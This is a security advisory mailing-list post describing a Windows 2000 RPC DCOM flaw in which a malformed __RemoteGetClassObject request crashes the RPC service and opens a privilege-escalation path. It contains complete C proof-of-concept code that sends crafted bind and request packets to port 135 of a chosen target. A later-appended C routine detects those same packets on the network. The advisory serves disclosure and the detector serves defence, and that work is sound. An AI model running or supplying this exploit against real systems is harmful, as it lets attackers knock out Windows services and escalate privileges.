From: benjurry at xfocus.org (benjurry)
Subject: Microsoft Windows 2000 RPC DCOM Interface DOS AND  Privilege Escalation Vulnerability

Microsoft Windows 2000 RPC DCOM Interface DOS AND  Privilege Escalation Vulnerability

1.Description:
  There is a vulnerability in the part of RPC that deals with message exchange over TCP/IP. The failure results from incorrect handling of malformed messages.
  By sending a message to the DCOM __RemoteGetClassObject interface, an attacker can crash the RPC service, and all services and applications that depend on the RPC service will behave abnormally.
  The cause is that the __RemoteGetClassObject interface passes a NULL pointer to the PerformScmStage function.
  If the attacker has an account, he can hijack the epmapper pipe and port 135 to escalate privileges after the RPC service has crashed.

2.Affected Systems:Windows 2000 +SP3
                   Windows 2000 +SP4+MS03-026 HotFix

  
3.Proof of concept code:
#include <winsock2.h>
#include <stdio.h>
#include <windows.h>
#include <process.h>
#include <string.h>
#include <winbase.h>

unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xA0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

unsigned char request[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x13,0x00,0x00,0x00,
0x90,0x00,0x00,0x00,0x01,0x00,0x03,0x00,0x05,0x00,0x06,0x01,0x00,0x00,0x00,0x00,
0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,
0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00};



void main(int argc,char ** argv)
{
    WSADATA WSAData;
    int i;
    SOCKET sock;
    SOCKADDR_IN addr_in;

    short port=135;
    unsigned char buf1[0x1000];
    printf("RPC DCOM DOS Vulnerability discoveried by Xfocus.org\n");
    printf("Code by FlashSky,Flashsky@...cus.org,benjurry,benjurry@...cus.org\n");
    printf("Welcome to http://www.xfocus.net\n");
    if(argc<2)
    {
        printf("useage:%s target\n",argv[0]);
        exit(1);
    }

    if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
    {
        printf("WSAStartup error.Error:%d\n",WSAGetLastError());
        return;
    }

    addr_in.sin_family=AF_INET;
    addr_in.sin_port=htons(port);
    addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]);

    if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
    {
        printf("Socket failed.Error:%d\n",WSAGetLastError());
        return;
    }
    if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
    {
        printf("Connect failed.Error:%d",WSAGetLastError());
        return;
    }
    if (send(sock,bindstr,sizeof(bindstr),0)==SOCKET_ERROR)
    {
        printf("Send failed.Error:%d\n",WSAGetLastError());
        return;
    }

    i=recv(sock,buf1,1024,MSG_PEEK);
    if (send(sock,request,sizeof(request),0)==SOCKET_ERROR)
    {
        printf("Send failed.Error:%d\n",WSAGetLastError());
        return;
    }
    i=recv(sock,buf1,1024,MSG_PEEK);
}

4.Author:flashsky@...cus.org
  e-mail:
   fangxing@...ustech.com.cn
   flashsky@...cus.org

Thanks to Benjerry@...cus.org for testing and translation.

You are welcome to visit our web sites:
   http://www.xfocus.org
   http://www.venustech.com.cn
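
For detection on the network side, the bind and request in the proof of concept can be recognised from their DCE/RPC headers alone: the bind names interface 000001a0-0000-0000-c000-000000000046 and the request carries opnum 3 on that context. The C below is an added example, not part of the original advisory or the authors' code; `inspect_pdu`, `conn_state` and the sample bytes are constructed here, and it assumes each buffer holds one complete client-to-server PDU in little-endian data representation.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Interface UUID from the advisory's bind packet, in wire order
   (000001a0-0000-0000-c000-000000000046). */
static const uint8_t ACTIVATOR_IF[16] = {0xA0,0x01,0,0,0,0,0,0,0xC0,0,0,0,0,0,0,0x46};
#define WATCHED_OPNUM 3 /* opnum field of the advisory's request packet */

struct conn_state { int bound; uint16_t ctx_id; }; /* hypothetical; one per TCP connection */

static uint16_t le16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }

/* Inspect one client-to-server PDU: 1 = alert, 0 = no alert, -1 = malformed. */
int inspect_pdu(struct conn_state *c, const uint8_t *b, size_t n)
{
    if (n < 16 || b[0] != 5 || b[1] != 0) return -1;  /* not DCE/RPC v5.0 */
    if ((b[4] & 0xF0) != 0x10) return 0;              /* big-endian drep not handled */
    size_t frag = le16(b + 8);
    if (frag < 16 || frag > n) return -1;             /* frag_length disagrees with capture */
    if (b[2] == 0x0B || b[2] == 0x0E) {               /* bind or alter_context */
        if (frag < 28) return -1;
        size_t off = 28;                              /* first presentation context element */
        for (unsigned i = 0; i < b[24]; i++) {
            if (off + 24 > frag) return -1;
            size_t next = off + 24 + 20u * b[off + 2]; /* abstract + transfer syntaxes */
            if (next > frag) return -1;
            if (memcmp(b + off + 4, ACTIVATOR_IF, 16) == 0) {
                c->bound = 1;                         /* remember which context id maps to it */
                c->ctx_id = le16(b + off);
            }
            off = next;
        }
        return 0;
    }
    if (b[2] == 0x00 && frag >= 24)                   /* request: p_cont_id at 20, opnum at 22 */
        return c->bound && le16(b + 20) == c->ctx_id && le16(b + 22) == WATCHED_OPNUM;
    return b[2] == 0x00 ? -1 : 0;
}

/* Constructed samples: a bind to the interface above, and a request header with no stub data. */
static const uint8_t SAMPLE_BIND[72] = {
    5,0,0x0B,3, 0x10,0,0,0, 72,0, 0,0, 1,0,0,0,  0xD0,0x16, 0xD0,0x16, 0,0,0,0, 1,0,0,0,
    1,0, 1,0, 0xA0,0x01,0,0,0,0,0,0,0xC0,0,0,0,0,0,0,0x46, 0,0,0,0,
    0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60, 2,0,0,0};
static const uint8_t SAMPLE_REQUEST[24] = {
    5,0,0x00,3, 0x10,0,0,0, 24,0, 0,0, 2,0,0,0,  0,0,0,0, 1,0, 3,0};
```

Legitimate DCOM clients also use this interface, so a hit is a signal to correlate with the source address and with a subsequent RPC service failure on the target.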
